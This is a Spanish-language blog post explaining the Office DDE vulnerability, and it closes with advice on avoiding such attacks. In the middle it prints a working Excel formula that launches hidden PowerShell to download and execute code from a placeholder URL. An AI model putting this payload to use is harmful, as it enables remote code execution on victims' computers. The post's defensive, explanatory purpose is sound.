Header add

Hackear Excel con una fórmula - DDE EXPLOIT


DDE EXPLOIT



A finales del año pasado (2017), se descubrió una vulnerabilidad que afecta a los productos más famosos de Microsoft, cómo lo son; Word, Excel, Outllook. Dicha vulnerabilidad es denominada "DDE EXPLOIT" o "Dynamic Data Exchange Exploit".

¿Qué es Dynamic Data Exchange?

En español "Intercambio Dinámico de Información", básicamente; la función del DDE es permitir a las aplicaciones de MS enviarse información entre ellas, y en ésto se basa la vulnerabilidad.

La vulnerabilidad:

Los atacantes cibernéticos se han basado en ésta funcionalidad para enviar código malicioso a través de las aplicaciones de Microsoft Office como excel y word, un ejemplo sería la ejecución de un código por cmd desde una fórmula de Excel.

El atacante agrega el código malicioso en una fórmula, y este se ejecuta inmediatamente al abrir el archivo.

Hack Excel con formula


Por seguridad Excel nos enviará el siguiente mensaje:


DDE Aviso

Un ejemplo de un ataque altamente peligroso, sería la ejecución de un código powershell que descargaría a nuestro ordenador cualquier tipo de virus, exponiéndonos a todo tipo de riesgos.

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://linkdelarchivomalicioso\");powershell -e $e'!A1

El código arriba, lo que hace básicamente, es realizar en segundo plano (de manera oculta) una petición de descarga a un servidor remoto, donde se encuentra el virus que el atacante usará para infectarnos.

¿Cómo protegernos?

Hasta el momento no existe parche para esta vulnerabilidad, sin embargo, podemos protegernos; no descargando archivos de Sitios web no confiables, no abriendo archivos de procedencias desconocidas, y si fallamos en lo mencionado anteriormente, lo más importante será cancelar la ejecución del comando, a través del mensaje de seguridad que nos brindará la aplicación, sea excel, word, outlook, etc.

Seguime en mis redes:

https://www.facebook.com/tododeacachete/
https://www.youtube.com/channel/UCZxc29KRr1aZN5wYgR1GOww?sub_confirmation=1


Publicar un comentario

0 Comentarios